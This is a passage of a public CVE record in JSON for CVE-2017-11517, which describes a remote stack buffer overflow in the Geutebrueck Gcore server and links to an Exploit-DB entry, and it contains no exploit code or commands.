          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-07-21T20:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "41153",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/41153/"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2017-11517",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "41153",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/41153/"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2017-11517",
        "datePublished": "2017-07-21T20:00:00.000Z",
        "dateReserved": "2017-07-21T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:25:55.226Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }